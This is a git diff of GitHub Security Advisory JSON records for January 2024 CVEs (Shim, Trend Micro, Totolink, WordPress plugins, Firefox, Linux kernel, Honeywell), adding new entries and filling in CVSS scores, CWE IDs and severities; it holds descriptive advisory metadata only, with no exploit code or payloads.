@@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json b/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json new file mode 100644 index 0000000000000..e8c3621d5dbfe --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-grx2-83w4-8647", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2023-40550" + ], + "details": "An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40550" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40550" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259915" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json b/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json index a2c53ef189b7c..d3a1a406c013e 100644 --- a/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json +++ b/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gvjg-pwqj-xrpj", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52330" ], "details": "A cross-site scripting vulnerability in Trend Micro Apex Central could allow a remote attacker to execute arbitrary code on affected installations of Trend Micro Apex Central.\n\nPlease note: user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json b/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json index 183592c0e0ea3..b76f8b93403d7 100644 --- a/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json +++ b/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gvqj-cjp6-grrv", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-31T15:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52338" ], "details": "A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json b/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json index beee5394642ff..358933e9142f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json +++ b/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-502" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json new file mode 100644 index 0000000000000..46cea6ad48a3c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3vc-4gq7-6h97", + "modified": "2024-01-29T15:30:27Z", + "published": "2024-01-29T15:30:27Z", + "aliases": [ + "CVE-2024-0998" + ], + "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. This affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0998" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252267" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252267" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json b/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json index 2d29bb2a72de7..c92daa69b4d7d 100644 --- a/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json +++ b/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h3x8-jx27-7vw4", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23210" ], "details": "This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user's phone number in system logs.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json b/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json index 35680151662e6..f2a2fbbdf5adc 100644 --- a/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json +++ b/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-284" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json b/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json new file mode 100644 index 0000000000000..078cec58bef75 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4gx-v8fr-h545", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22161" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harmonic Design HD Quiz allows Stored XSS.This issue affects HD Quiz: from n/a through 1.8.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22161" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json b/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json new file mode 100644 index 0000000000000..b9a06202c2813 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h53r-v36g-3338", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22295" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RoboSoft Photo Gallery, Images, Slider in Rbs Image Gallery allows Stored XSS.This issue affects Photo Gallery, Images, Slider in Rbs Image Gallery: from n/a through 3.2.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22295" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json b/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json new file mode 100644 index 0000000000000..5fe23a3690854 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h56c-gcxc-4q77", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24333" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the desc parameter in the setWiFiAclRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24333" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/15/TOTOlink%20A3300R%20setWiFiAclRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json b/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json index 55015d711ed2c..048ac39c43dce 100644 --- a/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json +++ b/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h59p-5475-hhmr", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0741" ], "details": "An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -41,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json b/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json index 3ba22d885bfb8..0eb456bedf754 100644 --- a/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json +++ b/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h5f8-8ppp-6wxq", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0809" ], "details": "Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json b/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json index e759851a4ac8e..7b9ccc45b6934 100644 --- a/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json +++ b/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h5vq-7cj5-594m", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-42144" ], "details": "Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json b/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json index 2a1d706914862..beb574e4b9723 100644 --- a/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json +++ b/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h6xq-j8xx-3fv4", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0754" ], "details": "Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json b/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json index 11f9e7cc4a037..5ef29c41caa3f 100644 --- a/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json +++ b/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h739-gq5p-h6x4", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T03:30:30Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23848" ], "details": "In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:35Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json b/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json index b6da6962f8b2e..1e64ea4490a8d 100644 --- a/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json +++ b/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-24" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json b/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json index fd77886d374da..03ee06a8d655d 100644 --- a/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json +++ b/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json @@ -32,7 +32,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-863" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json b/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json new file mode 100644 index 0000000000000..ae5664bcc60dd --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7wp-7q3v-7m5w", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-01-30T21:30:29Z", + "aliases": [ + "CVE-2023-5389" + ], + "details": "\nAn attacker could potentially exploit this vulnerability, leading to the ability to modify files on Honeywell Experion VirtualUOC and UOC . This exploit could be used to write a file that may result in unexpected behavior based on configuration changes or updating of files that could result in subsequent execution of a malicious application if triggered. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5389" + }, + { + "type": "WEB", + "url": "https://process.honeywell.com" + }, + { + "type": "WEB", + "url": "https://www.honeywell.com/us/en/product-security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-749" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json b/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json new file mode 100644 index 0000000000000..f49833bc158d8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h86h-5wxq-fv48", + "modified": "2024-01-29T00:30:17Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-0988" + ], + "details": "A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0988" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/2dBOnquxgCDl" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252253" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json b/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json new file mode 100644 index 0000000000000..a2c19381b5a49 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h994-99h2-49qc", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-30970" + ], + "details": "Gotham Table service and Forward App were found to be vulnerable to a Path traversal issue allowing an authenticated user to read arbitrary files on the file system.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30970" + }, + { + "type": "WEB", + "url": "https://palantir.safebase.us/?tcuUid=69be99ef-ad24-4339-9017-c8bf70789c72" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-36" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json b/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json index 00d8e4dded118..320c95cf93946 100644 --- a/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json +++ b/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-287" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json b/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json new file mode 100644 index 0000000000000..a62891c3841fe --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc6c-m8v3-634f", + "modified": "2024-02-06T15:32:04Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22158" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles allows Stored XSS.This issue affects Community by PeepSo – Social Network, Membership, Registration, User Profiles: from n/a before 6.3.1.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22158" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json b/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json new file mode 100644 index 0000000000000..04e233198f1f4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcj6-8f5v-24x9", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-22290" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS).This issue affects Custom Dashboard Widgets: from n/a through 1.3.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22290" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve" 